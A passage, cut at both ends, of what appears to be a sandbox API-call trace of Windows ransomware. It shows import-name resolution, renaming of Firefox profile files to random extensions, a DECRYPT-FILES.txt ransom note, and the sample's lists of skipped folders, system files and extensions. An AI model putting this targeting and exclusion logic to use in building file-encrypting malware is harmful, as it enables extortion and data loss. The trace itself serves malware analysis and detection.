returned="DeactivateActCtx" [0184.571] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0184.571] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0184.572] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0184.572] lstrlenA (lpString="DEBUGBREAK") returned 10 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0184.572] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0184.572] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0184.572] lstrlenA (lpString="DECODEPOINTER") returned 13 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0184.572] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0184.572] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0184.572] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0184.572] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0184.572] lstrlenA (lpString="DELETEATOM") returned 10 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0184.572] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0184.572] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0184.572] lstrlenA (lpString="DELETEFIBER") returned 11 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0184.572] lstrlenA (lpString="DELETEFILEA") returned 11 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0184.572] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0184.572] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0184.572] lstrlenA (lpString="DELETEFILEW") returned 11 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0184.572] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0184.572] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0184.573] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0184.573] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0184.573] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0184.573] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0184.573] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0184.573] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0184.573] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0184.573] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0184.573] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0184.573] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0184.573] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0184.573] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0184.573] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0184.573] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0184.573] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0184.573] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0184.573] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0184.573] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0184.573] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0184.573] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0184.574] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0184.574] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0184.574] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0184.574] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0184.574] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0184.574] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0184.574] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0184.574] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0184.574] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0184.574] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0184.574] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0184.574] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0184.574] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0184.574] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0184.574] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0184.575] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB") returned 103 [0184.575] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB.kIYF") returned 108 [0184.575] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.enub"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB.kIYF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.enub.kiyf"), dwFlags=0x0) returned 1 [0184.575] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.576] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.576] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.576] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad3358a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad3358a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps", cAlternateFileName="")) returned 1 [0184.576] lstrcmpW (lpString1="webapps", lpString2=".") returned 1 [0184.576] lstrcmpW (lpString1="webapps", lpString2="..") returned 1 [0184.576] lstrcatW (in: lpString1="webapps", lpString2="\\" | out: lpString1="webapps\\") returned="webapps\\" [0184.576] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Program Files") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch=":\\Windows") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Games\\") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\All Users") returned 0x0 [0184.576] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.577] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.577] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.577] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="AhnLab") returned 0x0 [0184.577] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0184.577] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.577] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\0a16c9.tmp") returned 107 [0184.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0184.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0184.577] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.577] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\DECRYPT-FILES.txt") returned 114 [0184.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.578] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0184.578] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*" [0184.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0b95b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0b95b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0184.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.578] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0b95b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0b95b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.578] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.579] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0b95b60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0b95b60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0b95b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.579] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.579] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.579] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.579] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.579] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.579] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0184.579] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.579] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0184.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\0a16c9.tmp" [0184.579] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.579] CloseHandle (hObject=0x0) returned 0 [0184.579] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.580] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad2e95e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad2e95e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad2e95e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.580] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.580] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xad30f740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10a, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json.KAUJZJ", cAlternateFileName="WEBAPP~1.KAU")) returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="autorun.inf") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="boot.ini") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="desktop.ini") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="ntuser.dat") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="iconcache.db") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="bootsect.bak") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="ntuser.dat.log") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="thumbs.db") returned 1 [0184.580] lstrcmpiW (lpString1="webapps.json.KAUJZJ", lpString2="Bootfont.bin") returned 1 [0184.580] lstrlenW 